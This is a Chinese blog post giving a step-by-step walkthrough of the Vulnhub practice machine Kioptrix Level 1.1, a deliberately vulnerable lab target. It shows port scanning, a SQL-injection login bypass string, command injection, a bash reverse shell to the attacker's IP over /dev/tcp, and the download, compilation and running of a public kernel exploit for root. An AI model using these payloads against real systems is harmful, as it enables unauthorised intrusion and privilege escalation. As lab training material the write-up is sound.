PJzhang:vulnhub靶机Kioptrix系列KIOPTRIX:LEVEL 1.1

猫宁~~~

 

地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

重点关注工具使用和测试思路。

kali linux攻击机   192.168.100.4

nmap 192.168.100.0/24

发现靶机

kioptr靶机IP   192.168.100.9

nmap -sV -p1-65535 192.168.100.9

获取指纹信息:

22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)

80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))

111/tcp  open  rpcbind    2 (RPC #100000)

443/tcp  open  ssl/https?

631/tcp  open  ipp        CUPS 1.1

666/tcp  open  status     1 (RPC #100024)

3306/tcp open  mysql      MySQL (unauthorized)

访问http://192.168.100.9/,显示登录框

用户名:admin'  or '1'='1--   密码:123456

通过万能密码直接登录成功。

显示Welcome to the Basic Administrative Web Console

输入0 && whoami,得知服务权限apache

输入;bash -i >& /dev/tcp/192.168.100.4/6666 0>&1执行

kali linux上nc -lvnp 6666,获取权限

uname -a,查看版本

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

可以提权。

searchsploit 9545

/usr/share/exploitdb/exploits/linux/local/9545.c

地址:https://www.exploit-db.com/exploits/9545

cp /usr/share/exploitdb/exploits/linux/local/9545.c /root/9545.c

python -m SimpleHTTPServer 80

靶机cd /tmp并wget http://192.168.100.6/9545.c

靶机gcc -o muma 9545.c

靶机执行./muma,顺利实现提权。

bash-3.00$变为sh-3.00$,root权限。

 

posted @ 2020-09-08 01:19  PJzhang  阅读(386)  评论(0编辑  收藏  举报